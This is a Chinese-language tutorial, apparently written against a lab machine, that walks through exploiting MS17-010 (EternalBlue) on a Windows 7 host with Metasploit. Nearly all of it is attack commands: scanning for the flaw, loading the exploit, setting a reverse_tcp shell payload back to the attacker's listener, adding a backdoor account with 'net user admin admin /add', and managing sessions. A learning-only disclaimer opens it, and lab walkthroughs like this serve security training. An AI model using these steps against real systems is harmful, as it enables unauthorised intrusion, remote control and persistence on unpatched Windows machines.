本文仅用于学习和研究,切勿用于非法用途,本文不承担任何法律责任
1.1 通过 msf 模块获取 Win7 主机远程 shell
1.1.1 我们先进入msf
msf5 > msfdb run
1.1.2我们再扫描目标是否存在 ms17-010 漏洞
msf5 > search ms17-01
1.1.3 我们使用 use 命令选中这个模块
msf5 > use auxiliary/scanner/smb/smb_ms17_010
然后我们查看模块需要配置的信息
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options
1.1.4 紧接着我们配置 RHOST 主机 IP
msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.1.10
开始扫描
msf5 auxiliary(scanner/smb/smb_ms17_010) > run
1.1.5 我们接着查找攻击模块
msf5 > search ms17-010
并使用 use 命令加载模块
msf5 > use exploit/windows/smb/ms17_010_eternalblu
1.1.6 然后我们查看模块需要配置的信息
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
1.1.7 紧接着我们设置一下目标主机 IP
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.1.10
并查看 exploit target 目标类型:
msf5 exploit(windows/smb/ms17_010_eternalblue) > show targets
我们可以看到这个模块只有一个 target,所以默认就选择这个目标系统。所以我们就不需要手动设置。
1.1.8然后我们找一个 payload,获取 shell 远程连接权限后,进行远程执行命令
msf5 exploit(windows/smb/ms17_010_eternalblue) > search windows/x64/shell type:payload
1.1.9 然后我们设置一下payload msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload
windows/x64/shell/reverse_tcp
1.1.10 我们查看一下 payloads 需要配置什么信息
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
1.1.11 我们设置一下本机 payload 监听地址
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.1.11
1.1.12 配置完成后我们开始执行
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
可以看见我们这边已经出现了目标主机也就是win7的shell
这边需要注意的一点是,如果我们出现win之后还是没有出现shell,我们回车一下就可以了
1.1.13 然后我们使用 DOS 命令创建用户
C:\Windows\system32>net user admin admin /add (注意/add前的空格)
我这边第一次漏打空格了,但是以为win编码和lin不一样,使用这边看不出来
所以我们这边要换一下编码 C:\Windows\system32>chcp 65001
1.1.14 然后我们再试一下,可以看到我们已经执行成功(刚才确实漏打了)
1.1.15 我们查看一下靶机上的用户
C:\Windows\system32>net user
可以看到我们新添加的用户admin
1.1.16 然后我们查看拿到的用户权限
C:\Windows\system32>whoami
这边去win7系统里看一下,确实多出来我们的新加的用户admin
1.2 通过会话进行连接目标机
1.2.1 我们先关闭链接
Ctrl+c
Abort session 1? [y/N] y
然后我们
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit -j
-j 表示后台执行 渗透目标完成后会创建一个 session 我们可以通过 session 连接目标主机
1.2.2 接着我们查看我们当前的会话
msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions
1.2.3 然后我们可以通过会话 Id 进入会话
msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions -i 2
1.2.4 background退出会话将会话保存到后台
C:\Windows\system32>background
1.2.5然后可以根据会话id来结束会话
msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions -k 2
然后我们再查看一下会话
msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions
可以看到我们的刚才id为2的会话已经结束了